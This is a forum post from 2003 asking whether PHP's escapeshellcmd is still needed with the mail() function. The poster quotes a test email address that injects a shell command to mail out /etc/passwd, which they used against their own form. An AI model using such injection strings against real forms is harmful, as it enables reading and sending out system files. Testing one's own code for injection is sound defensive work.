|
|||||||||
|
|||||||||
|
|||||||||
| |
|||
 |
|
|
|
|
|||||||||
|
|||||||||
|
|||||||||
| |
|||
|
|
|
|
| |||||||||
 |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Display Modes |
Dev Articles Community Forums Sponsor:
|
|
Free Web 2.0 Code Generator! Generate data entry and reporting .NET Web apps in minutes. Quickly create visually stunning, feature-rich apps that are easy to customize and ready to deploy. Download Now!
|
|
#1
January 16th, 2003, 03:29 AM
|
|||
|
|||
|
using escapeshellcmd with mail()
Is it still recommended it use the escapeshellcmd with the mail() function if I am not calling say sendmail directly?
I have tested my email form using the mail address of: '--bla ; mail URL </etc/passwd' but I only got the email i expected but with thr above line as the username. I will probably still use the escapeshellcmd to be safe but would like to know why using the mail function does not exploit this vulnerability.
|
|
| Viewing: Dev Articles Community Forums > Programming > Programming Tools > using escapeshellcmd with mail() |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
 |
|
|
Del.icio.us
Digg
Google
Spurl
Blink
Furl
Simpy
Y! MyWeb
Linear Mode
